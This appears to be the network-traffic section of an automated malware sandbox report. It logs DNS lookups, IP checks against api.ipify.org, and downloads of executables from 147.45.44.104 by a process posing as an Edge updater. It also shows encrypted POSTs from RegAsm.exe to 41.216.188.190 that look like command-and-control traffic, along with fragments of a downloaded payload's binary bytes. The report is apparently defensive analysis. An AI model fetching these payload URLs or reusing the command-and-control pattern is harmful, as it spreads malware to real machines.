                                                                                                                                                                                                                                          Oct 2, 2024 14:46:13.486573935 CEST1.1.1.1192.168.2.60xa1f9Name error (3)55.235.10.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:15.645833969 CEST1.1.1.1192.168.2.60x4f5eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:15.645833969 CEST1.1.1.1192.168.2.60x4f5eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:15.645833969 CEST1.1.1.1192.168.2.60x4f5eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:25.601999044 CEST1.1.1.1192.168.2.60xcd39No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:25.601999044 CEST1.1.1.1192.168.2.60xcd39No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:25.601999044 CEST1.1.1.1192.168.2.60xcd39No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.649708104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.253235102 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:45.715502977 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:45 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c6335dd80ca9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.072877884 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:47.177329063 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:47 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c63c8a7d0ca9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:21.872692108 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:21.991523027 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:21 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7160ef40ca9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:23.090347052 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:23.193412066 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:23 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c71d9b8f0ca9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          1192.168.2.649711147.45.44.104804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.282007933 CEST92OUTGET /ldms/66fb252fe232b_Patksl.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961133957 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:48 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 1964072
                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 22:24:47 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fb252f-1df828"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 87 24 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c8 1d 00 00 08 00 00 00 00 00 00 3e e6 1d 00 00 20 00 00 00 00 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 1e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec e5 1d 00 4f 00 00 00 00 00 1e 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 d2 1d 00 28 26 00 00 00 20 1e 00 0c 00 00 00 b4 e4 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ @`O(& H.textD `.rsrc@@.reloc @B H wK!"h&NJ$mUOjSuYF{AYv5:#I5,J7+.:xJ&m)/uTj=bU/E7?_G\zd{$C=|Ne,M4_?^9e@Fd8:-ZNJ*4*HD]0+[hkZKhR<2DC+=~iNY+py,5b%0^i,Nz@hmsdwB
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961149931 CEST1236INData Raw: 34 60 bb a8 35 91 ec 5b 6f ec b0 6c 11 44 72 7d 40 5c ca 42 de d6 d9 5c 96 01 18 61 01 fa 92 f1 57 9c 62 80 79 60 53 30 0d dd 30 52 76 90 bd 1e 1e f7 6c 98 06 14 2d 8f f4 28 8b 31 6d 37 77 31 fe 01 13 b8 87 89 2e c0 35 c0 b4 8c 3c 2c 78 5a 78 7b
                                                                                                                                                                                                                                          Data Ascii: 4`5[olDr}@\B\aWby`S00Rvl-(1m7w1.5<,xZx{:~Y@&"ecN_I{CLW1efP4w%!2c=(<5P @&(gTjxm_9h<7jM9_3Pm,4m
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961164951 CEST1236INData Raw: 27 dd d5 13 b1 ca 7f fd 01 ea 6e e5 cf 42 05 9b cb 43 cf a1 fb 7d b3 89 90 40 0a c8 f7 72 71 9f be e9 35 fe 99 bb fa e8 d0 5a 39 fc 9b 29 b1 38 ce 40 f8 29 98 9b 79 72 5f 1b 6e 58 e5 de f3 fa 83 8b b2 85 21 23 2c 8d c8 1b 0e 34 e1 6d b3 07 51 f2
                                                                                                                                                                                                                                          Data Ascii: 'nBC}@rq5Z9)8@)yr_nX!#,4mQ0}'@XIWdCFs7ZaM)kiZ~T#tb=sOs"#>/1ukKFQ'"@*IfmEOswens__UGn0_uz
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961283922 CEST1236INData Raw: 41 eb 9b 92 ec 5a 7c 3f 89 5d ea 70 01 66 62 3b f2 18 43 59 76 a5 bf 8c bb a1 da 40 76 1f dc 5e b9 95 b8 fe 10 dd d7 b6 5d 6f b2 29 aa 9b 46 0d 97 7a e5 ee d0 1c 88 b4 a1 8e c8 ce a1 e9 1e 8b 5d c3 2a 34 ad ad 77 7c 34 ad b1 5b b5 77 82 85 d1 db
                                                                                                                                                                                                                                          Data Ascii: AZ|?]pfb;CYv@v^]o)Fz]*4w|4[w%]M,5%V@k|2U.,#$A:)0:4G$AsMq-N:{y.,T%6Yv+2u1&eT:uf8"{vL
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961296082 CEST896INData Raw: 1c db 2d 14 4e 94 4c 54 47 64 48 9d 22 ae 1e b2 66 2d 18 bc 00 a2 fb 3e 89 ad 3e 5f aa 95 96 3b fb 16 b1 81 c0 f3 b5 cb 32 5c 16 38 cc 8f fb d7 35 a2 cc f2 70 33 bd e6 19 7f a5 fe d1 ec d0 5d 41 45 0d e3 7e 04 25 12 f1 ca f2 2b c4 8a 1c aa ee e7
                                                                                                                                                                                                                                          Data Ascii: -NLTGdH"f->>_;2\85p3]AE~%+;m1GoW"0zD!LeX)iDUqI2#EO/)08IQ_lAkO*Y%&KM=4Fec,6m8vl3R~?<m=
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961306095 CEST1236INData Raw: 61 12 95 eb 9d 3a 92 3a a7 cf ef 6a e9 0f 80 24 d1 ba 90 12 06 de b0 0f ea 5c 54 10 bd 37 fd 30 b1 fc 8a f1 1b dc c9 18 36 b4 a6 15 0c 7a d3 64 c7 1c fc cd 00 15 84 51 59 13 88 fb fb 6b 05 c2 53 89 01 03 05 6a 8a 95 ea 66 6d 41 61 36 a4 57 54 ec
                                                                                                                                                                                                                                          Data Ascii: a::j$\T706zdQYkSjfmAa6WTt`& hJUU5La8*AW}<'"i5_/}QI<v;R,#{w3A71&]`Y o-bss0q)~5Ezx7v7 @M
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961316109 CEST1236INData Raw: ed 61 0e 05 9d 6a bd 3a 71 36 38 25 9d 5d 4e e2 08 92 13 0b 47 d1 73 91 0d 62 63 41 43 fb c6 c1 ea 42 3c 6f 0d 26 14 54 24 68 5b 7f 8c 1c 24 6f b7 5d 7d 62 b5 52 ee 2e 1e 10 e5 12 83 d3 e4 da cf b7 02 08 f3 e3 d0 a4 51 10 46 ff a5 5a e5 40 b5 9c
                                                                                                                                                                                                                                          Data Ascii: aj:q68%]NGsbcACB<o&T$h[$o]}bR.QFZ@MOVNb868LkED%0tY+I9|${_Fjm\mUp{Lo&9FR7tnFgK|aSeTGG@iyU:n
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961327076 CEST1236INData Raw: 6e 00 24 62 90 5d 65 5a f8 a0 51 71 10 b5 96 6e 84 86 5c d2 f7 81 b6 e5 7c 97 ab 28 6b a5 d5 54 fb 12 e8 1d 21 fb 75 7a e2 75 bd e2 9d f2 92 14 a5 42 05 41 a9 05 3e bd 7e 50 4c ff e4 d3 75 9a 55 3c e7 b0 ce a3 fe a0 b5 90 78 cb 99 62 ca f1 70 94
                                                                                                                                                                                                                                          Data Ascii: n$b]eZQqn\|(kT!uzuBA>~PLuU<xbpE-#)4t}E,!~6]`<2Jgy-HOp9Zw{`c,A.E$@Q&`>{$eN(Fqn$8rL(;gDktt"L1%fd' /
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961529970 CEST1236INData Raw: 28 fc 00 06 19 5c 93 50 7b e5 24 d9 e7 35 51 6c 5a 63 28 12 39 0d 8a d6 39 7f 60 70 ac 37 5c b4 d0 25 45 e7 31 73 22 cc ee 5e 6a 86 39 80 0a 62 cd c4 fd d9 2d f4 0b cc ea da 14 2f e1 66 ec c1 9d 1f 76 ea 7a 00 ea 78 cf cb f2 b8 40 c5 56 c4 6d fc
                                                                                                                                                                                                                                          Data Ascii: (\P{$5QlZc(99`p7\%E1s"^j9b-/fvzx@VmROmZs?0]&4VPTv`hvJo5^<kRM[Q83(WiOA?]znSqpT.$C%n(G)?'OfNQk\yg8
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.961540937 CEST1236INData Raw: d0 2b f4 fa 30 f5 ac ef 77 61 24 3e 24 54 31 73 01 fb 02 c2 8c 82 df 88 48 55 3d 4c f5 17 1e c7 24 fa 26 70 bf fb 19 f5 75 8a cc 73 9a 5c 8a ae 04 17 c2 a5 61 94 e8 ba 86 e8 e2 8a 3c 54 35 96 e8 cc 5c 14 f7 63 0d e4 35 30 c9 65 86 45 5e 50 10 da
                                                                                                                                                                                                                                          Data Ascii: +0wa$>$T1sHU=L$&pus\a<T5\c50eE^PS9EdCfLCV^'E[,^KK6U'GaImiaGOvt@<iG[Iq&3~;lhjap135da7K&"
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:48.966021061 CEST1236INData Raw: 80 5b c0 a6 ea 67 85 8a 91 c9 41 bd eb 27 bd 3a b4 6c 67 07 8a 97 92 d7 d4 35 10 bb 1a 4f 4b 0b 78 f3 cf fc b5 43 5c 0b f4 da aa 05 4b 8a d6 39 86 b8 db c1 32 0b 47 dd 5b 9d 5a 63 a3 2b 6f 8a 93 c9 dd 63 11 99 77 c0 e9 03 e8 85 e7 26 ec ac b0 7d
                                                                                                                                                                                                                                          Data Ascii: [gA':lg5OKxC\K92G[Zc+ocw&} vlT4S ~k}&P,N^d`]R*V%p[U*( |&><jj5dk=+pb[cZ'!v4R@PV$UEAo_i%$+^$


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          2192.168.2.64971441.216.188.19080364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.194612980 CEST204OUTGET /api/wp-ping.php HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: 41.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:53.901479959 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:53 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                          X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                          Content-Length: 6
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 66 69 73 68 31 35
                                                                                                                                                                                                                                          Data Ascii: fish15
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:57.458441973 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 133
                                                                                                                                                                                                                                          Host: 41.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:57.458441973 CEST133OUTData Raw: 64 61 74 61 3d 76 63 4e 42 51 44 4c 2d 43 49 68 73 51 75 6a 4d 71 77 57 79 61 55 38 62 33 2d 4f 73 53 4a 74 47 6f 54 4d 2d 34 74 4f 67 6e 59 4e 6b 70 46 71 4a 7a 56 2d 67 48 31 65 70 58 69 55 4c 6a 6c 4b 4a 52 63 4b 6e 4b 51 68 6a 51 57 59 79 6a
                                                                                                                                                                                                                                          Data Ascii: data=vcNBQDL-CIhsQujMqwWyaU8b3-OsSJtGoTM-4tOgnYNkpFqJzV-gH1epXiULjlKJRcKnKQhjQWYyj59ShP5vPycptOVJoxirMfG24NIIVRu1sTvcQ3Wq04PU1Y-6SLAk
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.648610115 CEST362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:57 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                          X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                          Content-Length: 108
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 68 63 4c 6f 67 74 30 6c 36 79 36 63 5a 6b 64 79 47 78 68 54 42 63 6f 4b 58 78 69 61 4b 55 54 33 6d 42 45 65 4a 54 48 2f 45 6c 34 79 2b 66 7a 53 44 37 49 4e 64 72 63 35 59 53 37 39 72 34 7a 56 62 51 77 6c 6a 2b 63 55 74 74 51 64 70 64 4f 34 55 41 62 49 4a 4a 38 65 6f 74 2b 31 46 47 35 75 56 35 34 39 32 43 53 44 65 4a 55 3d
                                                                                                                                                                                                                                          Data Ascii: hcLogt0l6y6cZkdyGxhTBcoKXxiaKUT3mBEeJTH/El4y+fzSD7INdrc5YS79r4zVbQwlj+cUttQdpdO4UAbIJJ8eot+1FG5uV5492CSDeJU=
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.769567966 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 133
                                                                                                                                                                                                                                          Host: 41.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:58.769610882 CEST133OUTData Raw: 64 61 74 61 3d 35 42 75 5a 72 69 51 2d 34 73 61 38 49 41 4c 58 75 49 49 72 53 65 79 43 47 5f 65 50 51 64 54 41 76 71 42 33 32 32 37 7a 6b 75 56 6f 31 4c 75 6b 4b 5f 70 73 47 78 6e 59 64 2d 6e 48 57 6f 62 47 78 64 79 72 30 31 41 63 6c 54 4d 42 7a
                                                                                                                                                                                                                                          Data Ascii: data=5BuZriQ-4sa8IALXuIIrSeyCG_ePQdTAvqB3227zkuVo1LukK_psGxnYd-nHWobGxdyr01AclTMBzjWCqynXRodSYWTRpH4gEmbyICWfo_nYcKp8GAeh2ILK_g73qLsU
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.049180984 CEST682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:58 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                          X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                          Content-Length: 428
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 77 52 77 48 59 76 32 4f 38 53 6e 4c 49 56 62 6c 43 7a 4f 39 59 49 78 6f 66 35 62 67 49 4e 2f 35 37 46 6c 2b 71 6d 50 46 72 30 4d 76 46 46 53 73 39 51 35 75 75 57 4a 68 6f 41 38 55 6d 56 70 33 6d 51 35 69 65 53 6a 4e 68 72 33 62 5a 5a 34 4e 32 59 35 4d 56 36 57 78 6c 78 35 42 68 6a 6d 49 62 72 32 75 30 4b 63 4a 6e 48 2f 50 4d 38 4b 59 36 4a 51 51 2b 41 78 69 52 75 34 63 41 47 4c 65 51 4e 49 33 61 6f 43 42 6a 6c 51 6a 33 63 4d 2f 46 78 59 78 41 43 36 6e 7a 68 6e 7a 42 2b 76 56 64 2f 75 39 57 74 79 62 59 47 59 4b 4a 63 65 47 79 74 6a 69 57 7a 55 47 55 42 6f 4a 36 4b 58 51 42 6f 69 6f 56 5a 41 65 35 44 53 4c 4d 4a 64 2b 66 30 50 34 6f 47 75 38 6f 30 75 5a 4e 36 55 7a 56 39 54 72 43 78 66 48 35 51 6e 6b 6d 47 43 2b 59 35 66 54 52 35 62 72 2b 65 56 49 69 4e 61 53 35 55 4d 61 39 4c 37 58 38 4c 44 35 66 64 31 6d 65 75 41 4c 31 73 31 35 77 78 6d 57 4c 50 74 61 59 32 77 53 72 73 37 72 4e 79 72 6f 6b 70 4e 6c 56 52 50 4b 61 41 7a 38 48 32 41 51 73 7a 58 68 54 61 71 4e 6e 44 65 65 58 33 48 49 4c 6a 6a 4e 4b 2b [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: wRwHYv2O8SnLIVblCzO9YIxof5bgIN/57Fl+qmPFr0MvFFSs9Q5uuWJhoA8UmVp3mQ5ieSjNhr3bZZ4N2Y5MV6Wxlx5BhjmIbr2u0KcJnH/PM8KY6JQQ+AxiRu4cAGLeQNI3aoCBjlQj3cM/FxYxAC6nzhnzB+vVd/u9WtybYGYKJceGytjiWzUGUBoJ6KXQBoioVZAe5DSLMJd+f0P4oGu8o0uZN6UzV9TrCxfH5QnkmGC+Y5fTR5br+eVIiNaS5UMa9L7X8LD5fd1meuAL1s15wxmWLPtaY2wSrs7rNyrokpNlVRPKaAz8H2AQszXhTaqNnDeeX3HILjjNK+mbAvKEmYXZIDvHVtY+RWnFn/AaaWdcC758iu5ET+beiFP/o+IBZ5U/2fwFgzUBEK+OViZHcr8qTXVWj/m5nN107Fk=
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:02.087035894 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 349
                                                                                                                                                                                                                                          Host: 41.216.188.190
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:02.087328911 CEST349OUTData Raw: 64 61 74 61 3d 47 62 2d 55 34 68 75 62 50 7a 78 57 72 34 6d 79 70 59 45 6d 6d 35 5f 42 6b 42 79 6b 44 53 72 6c 75 57 62 54 41 77 48 4c 57 4d 67 5f 47 4f 57 47 41 52 76 4e 43 63 72 6d 6f 59 64 6d 6a 73 63 58 51 37 50 55 34 51 4a 49 47 5a 74 35 52
                                                                                                                                                                                                                                          Data Ascii: data=Gb-U4hubPzxWr4mypYEmm5_BkBykDSrluWbTAwHLWMg_GOWGARvNCcrmoYdmjscXQ7PU4QJIGZt5RkBJWVTQoJT-ULOljKE9W_Dbl2h3exN3JpLqWKxMST2UVYqFdAAXEhMWCfYhwdNnQgsX1zCOTjwjJvm9GxAstcFLKPgZ524Ad74J0-KpxAVSTf75OcMauT0z3uYNHfzwNC_pZnC1eyEO7MS0wRx9NFe8qkTA0K8EXr
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:03.538356066 CEST362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:02 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                          X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                          Content-Length: 108
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 39 57 65 32 4d 72 63 7a 56 52 74 67 52 79 4f 4d 6f 65 46 34 4d 69 4c 45 51 6a 6f 6d 75 59 6f 6e 4c 6d 30 69 39 33 6b 34 62 76 31 57 69 61 72 33 49 54 47 43 4e 77 32 61 6d 4d 2b 64 75 6a 49 59 4d 45 55 43 69 41 71 5a 71 77 52 73 69 50 57 55 39 31 54 6c 72 39 52 43 73 4c 6b 69 39 51 4e 31 48 2f 56 34 4c 62 79 30 32 76 30 3d
                                                                                                                                                                                                                                          Data Ascii: 9We2MrczVRtgRyOMoeF4MiLEQjomuYonLm0i93k4bv1Wiar3ITGCNw2amM+dujIYMEUCiAqZqwRsiPWU91Tlr9RCsLki9QN1H/V4Lby02v0=


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          3192.168.2.649725147.45.44.10480364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590770006 CEST221OUTHEAD /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.224318981 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:01 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 423840
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:45 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfccd-677a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.226046085 CEST220OUTGET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409511089 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:01 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 423840
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:45 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfccd-677a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
